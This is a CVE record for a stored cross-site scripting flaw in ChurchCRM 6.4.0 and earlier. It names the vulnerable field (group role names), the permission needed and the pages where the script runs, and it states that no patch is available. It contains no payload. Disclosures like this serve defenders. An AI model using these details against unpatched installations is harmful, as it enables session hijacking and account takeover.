Home

Description

ChurchCRM is an open-source church management system. A stored cross-site scripting (XSS) vulnerability exists in ChurchCRM versions 6.4.0 and prior that allows a low-privilege user with the “Manage Groups” permission to inject persistent JavaScript into group role names. The payload is saved in the database and executed whenever any user (including administrators) views a page that displays that role, such as GroupView.php or PersonView.php. This allows full session hijacking and account takeover. As of time of publication, no known patched versions are available.

PUBLISHED Reserved 2025-12-12 | Published 2025-12-17 | Updated 2025-12-18 | Assigner GitHub_M




CRITICAL: 9.3CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L

Problem types

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Product status

<= 6.4.0
affected

References

github.com/...RM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh exploit

github.com/...RM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh

cve.org (CVE-2025-67876)

nvd.nist.gov (CVE-2025-67876)

Download JSON

Data based on CVE®. Copyright © 1999-2025, The MITRE Corporation. All rights reserved.